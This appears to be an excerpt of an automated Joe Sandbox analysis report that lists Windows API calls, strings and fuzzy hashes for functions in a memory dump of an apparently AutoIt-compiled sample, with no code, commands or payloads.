GetLocalTime.KERNEL32 ref: 00DD86BB
_wcsncpy.LIBCMT ref: 00DD86F0
_wcsncpy.LIBCMT ref: 00DD8722
_wcsncpy.LIBCMT ref: 00DD8755
_wcsncpy.LIBCMT ref: 00DD8797
_wcsncpy.LIBCMT ref: 00DD87D1
_wcsncpy.LIBCMT ref: 00DD8800

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 8c6a46d9e6d9f48513345c4e4a73dbce810c47eb7339fa2015151bfdebcfa79e
Instruction ID: 574fc5a34bab3187420031279e0bed10fefd352db3a1208e559573e91db30b33
Opcode Fuzzy Hash: 8c6a46d9e6d9f48513345c4e4a73dbce810c47eb7339fa2015151bfdebcfa79e
Instruction Fuzzy Hash: 2B414D6AC10214B5CB11EBB8C887ADEB7BCEF05710F908866E556F3221EA30E65587B5

Function 00DF3C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00DF3C92
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DF3CBC
FreeLibrary.KERNEL32(00000000), ref: 00DF3D71

Part of subcall function 00DF3C63: RegCloseKey.ADVAPI32(?), ref: 00DF3CD9
Part of subcall function 00DF3C63: FreeLibrary.KERNEL32(?), ref: 00DF3D2B
Part of subcall function 00DF3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00DF3D4E

RegDeleteKeyW.ADVAPI32(?,?), ref: 00DF3D16

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 469c422d03b1601f7901a60f2a0e331d193e3ac1f76ceb8cc167a1f83aac3420
Instruction ID: 15be9b312f423da9ab21efa8116bb6dba2b03fafdfa27b34b0c8aa5a53b73114
Opcode Fuzzy Hash: 469c422d03b1601f7901a60f2a0e331d193e3ac1f76ceb8cc167a1f83aac3420
Instruction Fuzzy Hash: 8831097190121DBFDB14DF95DC89AFEB7BDEF08300F05816AE612A2150D6709F899B70

Function 00DF8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00DF8DF4
GetWindowLongW.USER32(013A9458,000000F0), ref: 00DF8E27
GetWindowLongW.USER32(013A9458,000000F0), ref: 00DF8E5C
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00DF8E8E
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00DF8EB8
GetWindowLongW.USER32(?,000000F0), ref: 00DF8EC9
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DF8EE3

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: bf5e90e42dfe72e84addadba6647e6f215fca2740d7fc5faad112a8fc53248e7
Instruction ID: 4ce59fbf0a3b43a9b025ae1725414d619208dd911b74b82caa1499e5ce8bcaca
Opcode Fuzzy Hash: bf5e90e42dfe72e84addadba6647e6f215fca2740d7fc5faad112a8fc53248e7
Instruction Fuzzy Hash: 81318A31604218EFDB24CF49DC84FA537E0FB4A314F0A85A4F6119B2B2CB72AC44EB52

Function 00DD16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD1734
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD175A
SysAllocString.OLEAUT32(00000000), ref: 00DD175D
SysAllocString.OLEAUT32(?), ref: 00DD177B
SysFreeString.OLEAUT32(?), ref: 00DD1784
StringFromGUID2.COMBASE(?,?,00000028), ref: 00DD17A9
SysAllocString.OLEAUT32(?), ref: 00DD17B7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 9db3d84d7d6c6f441795484055b8c66bdf9d76e7f34345c02dc4fb12442940c6
Instruction ID: 079adb4f462087c7e88c81868f156fcad40f5a0a98088a7dc1c8bdc947f31391
Opcode Fuzzy Hash: 9db3d84d7d6c6f441795484055b8c66bdf9d76e7f34345c02dc4fb12442940c6
Instruction Fuzzy Hash: 55215179604219BF9B109FA9DC88DEF77ECEB09360B448126F915DB260D674EC458770

Function 00DD69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D931DA

lstrcmpiW.KERNEL32(?,?), ref: 00DD6A2B
_wcscmp.LIBCMT ref: 00DD6A49
MoveFileW.KERNEL32(?,?), ref: 00DD6A62

Part of subcall function 00DD6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00DD6DBA
Part of subcall function 00DD6D6D: GetLastError.KERNEL32 ref: 00DD6DC5
Part of subcall function 00DD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00DD6DD9

_wcscat.LIBCMT ref: 00DD6AA4
SHFileOperationW.SHELL32(?), ref: 00DD6B0C

Strings

\*.*, xrefs: 00DD6A9E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 2323102230-1173974218
Opcode ID: fcb7ace0975c44c8fa328deb505493ccd587c8d269171ba13920f17cbd49839b
Instruction ID: ea15afd1f8ec2179a5dff69a38bd68367e0551a9b31a4d636264ff84a0f926a5
Opcode Fuzzy Hash: fcb7ace0975c44c8fa328deb505493ccd587c8d269171ba13920f17cbd49839b
Instruction Fuzzy Hash: 09311271800218AACF50EFA4E845ADDB7B8AF08300F5455EBE545F3251EB34DB89CBB4

Function 00DD2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00DD2FE0
__wcsnicmp.LIBCMT ref: 00DD3001
__wcsnicmp.LIBCMT ref: 00DD301B

Strings

#notrayicon, xrefs: 00DD2FD8
#OnAutoItStartRegister, xrefs: 00DD3015
#requireadmin, xrefs: 00DD2FFB

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 4d669c8482c5a4f8263b381325e51529765f802a5cf0ed35b1c611c6520d7020
Instruction ID: 5ac91406707b7ba7fa40c5648170aba7165512aaf95b654eed8eb61a996c9b9d
Opcode Fuzzy Hash: 4d669c8482c5a4f8263b381325e51529765f802a5cf0ed35b1c611c6520d7020
Instruction Fuzzy Hash: CA212972108621B6D231EB359C02FF7B3E8DF65350F184427F58697295EB919A82C2B2

Function 00DD17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD180D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DD1833
SysAllocString.OLEAUT32(00000000), ref: 00DD1836
SysAllocString.OLEAUT32 ref: 00DD1857
SysFreeString.OLEAUT32 ref: 00DD1860
StringFromGUID2.COMBASE(?,?,00000028), ref: 00DD187A
SysAllocString.OLEAUT32(?), ref: 00DD1888

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 20fe101839f3c5537ba1a63447f09b69da878af9a8a665492381b742cb5e647b
Instruction ID: 3bb36a494c7aee0b45d29bb8812c0ea40c2018f1a42f67a42e737d5e06b0088a
Opcode Fuzzy Hash: 20fe101839f3c5537ba1a63447f09b69da878af9a8a665492381b742cb5e647b
Instruction Fuzzy Hash: 56216079604204BFDB10DFE9DC88DAE77ECEB09360B448126F915DB2A0DA74EC419B70

Function 00DFA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DAC657
Part of subcall function 00DAC619: GetStockObject.GDI32(00000011), ref: 00DAC66B
Part of subcall function 00DAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DAC675

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DFA13B
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DFA148
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DFA153
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DFA162
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DFA16E

Strings

Msctls_Progress32, xrefs: 00DFA10C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 25bab2c378d8ccdca42302b529b7226dbcb53e132c8b79d72fba7b53dadd09a9
Instruction ID: 10762bae306b5deee2c961a6b1ec9c70942e15eddc1f5eb5ba780e1d02d681b4
Opcode Fuzzy Hash: 25bab2c378d8ccdca42302b529b7226dbcb53e132c8b79d72fba7b53dadd09a9
Instruction Fuzzy Hash: 8D1181B115021DBEEB154F65CC85EE77F5DEF08798F028115FA08A6090C6729C21DBA0

Function 00DB4C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00DB4C3E

Part of subcall function 00DB86B5: GetLastError.KERNEL32(?,00DB0127,00DB88A3,00DB4673,?,?,00DB0127,?,00D9125D,00000058,?,?), ref: 00DB86B7
Part of subcall function 00DB86B5: __calloc_crt.LIBCMT ref: 00DB86D8
Part of subcall function 00DB86B5: GetCurrentThreadId.KERNEL32 ref: 00DB8701
Part of subcall function 00DB86B5: SetLastError.KERNEL32(00000000,00DB0127,00DB88A3,00DB4673,?,?,00DB0127,?,00D9125D,00000058,?,?), ref: 00DB8719

CloseHandle.KERNEL32(?,?,00DB4C1D), ref: 00DB4C52
__freeptd.LIBCMT ref: 00DB4C59
RtlExitUserThread.NTDLL(00000000,?,00DB4C1D), ref: 00DB4C61
GetLastError.KERNEL32(?,?,00DB4C1D), ref: 00DB4C91
RtlExitUserThread.NTDLL(00000000,?,?,00DB4C1D), ref: 00DB4C98
__freefls@4.LIBCMT ref: 00DB4CB4

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
String ID:
API String ID: 1445074172-0
Opcode ID: 58e4f99817fca7ea0b13391f67a90662ae7e3e6ca1fffac3560c6896ae43cdfa
Instruction ID: 3e0ba11a791b0db6afc9e0f782f1e0f9a2c5b97831fa7691ea61d66e4a13363c
Opcode Fuzzy Hash: 58e4f99817fca7ea0b13391f67a90662ae7e3e6ca1fffac3560c6896ae43cdfa
Instruction Fuzzy Hash: D401B870801601EFC729BFB4D90A9CE7BE9EF04714B148518F91B9B252EF34D846DAB1

Function 00DFE13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DFE14D
_memset.LIBCMT ref: 00DFE15C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E53EE0,00E53F24), ref: 00DFE18B
CloseHandle.KERNEL32 ref: 00DFE19D

Strings

>, xrefs: 00DFE147
$?, xrefs: 00DFE156

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: $?$>
API String ID: 3277943733-2278415509
Opcode ID: 206100d6fb187b2b0a5cebb223e9bc612acfd55b0e1342bbbfbc507b586ac13b
Instruction ID: a412e20e35b9855446a252dbb3813e44a97702af9c9e1b63e8bc5367416824d4
Opcode Fuzzy Hash: 206100d6fb187b2b0a5cebb223e9bc612acfd55b0e1342bbbfbc507b586ac13b
Instruction Fuzzy Hash: 44F09AB1A40300BFF2105B32AC06FF77AACDB09396F004821BA14E51A2D7B68E1886B4

Function 00DAC697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00DAC6C0
GetWindowRect.USER32(?,?), ref: 00DAC701
ScreenToClient.USER32(?,?), ref: 00DAC729
GetClientRect.USER32(?,?), ref: 00DAC856
GetWindowRect.USER32(?,?), ref: 00DAC86F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 1d87da7a2dd18ba32b102baf8e65b5fa55fc019dfb28bcf601282c5caeb19c1b
Instruction ID: 026ba5bbfdbb3f72f177f6a8c0953b098b402278c561214a5679c5f0da655c92
Opcode Fuzzy Hash: 1d87da7a2dd18ba32b102baf8e65b5fa55fc019dfb28bcf601282c5caeb19c1b
Instruction Fuzzy Hash: 99B14B79A1024ADBDF10CFA8C5807EDB7B1FF09314F14A52AEC99EB254DB34A940CB64

Function 00DD9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DD96BC
_memmove.LIBCMT ref: 00DD95F7

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

_memmove.LIBCMT ref: 00DD966A
_memmove.LIBCMT ref: 00DD9751
_memmove.LIBCMT ref: 00DD976A
_memmove.LIBCMT ref: 00DD9786

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
Instruction ID: cebe297ca6d7652851d80c1c98b401525eaeab52d9bc76f21afde7e16b886a47
Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
Instruction Fuzzy Hash: D261AB3161020AABCF01EF64CC92EFE77A9EF05318F04455AF85A6B292EB35D905CB71

Function 00DF2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

Part of subcall function 00DF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DF2AA6,?,?), ref: 00DF3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DF2FA0
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DF2FE0
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00DF3003
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DF302C
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DF306F
RegCloseKey.ADVAPI32(00000000), ref: 00DF307C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: ab6ab9c591720cc063adac8990f6700d84e22ff71b689ce470178da1e3311b9c
Instruction ID: 302c7f90f0456db621a8d4b7769378dc5a1a199770044fa681a302e01558a547
Opcode Fuzzy Hash: ab6ab9c591720cc063adac8990f6700d84e22ff71b689ce470178da1e3311b9c
Instruction Fuzzy Hash: C7514B31118204AFCB04EF65C885E6AB7E9FF88714F05891EF685972A1DB71EA05CB72

Function 00DADB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00DADCC0
_wcscat.LIBCMT ref: 00DADCC7
_wcscpy.LIBCMT ref: 00E03CCB

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _wcscpy$_wcscat
String ID:
API String ID: 2037614760-0
Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
Instruction ID: 97d2fb57b05e886a2bda75f9e6d54524444b6a5d5fff52312685583d7c4a162e
Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
Instruction Fuzzy Hash: F0511931900215AECF11AF98C4419FDB7B2FF0A720F98404AF582A7591DB749F82D7B1

Function 00DD2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DD2AF6
VariantClear.OLEAUT32(00000013), ref: 00DD2B68
VariantClear.OLEAUT32(00000000), ref: 00DD2BC3
_memmove.LIBCMT ref: 00DD2BED
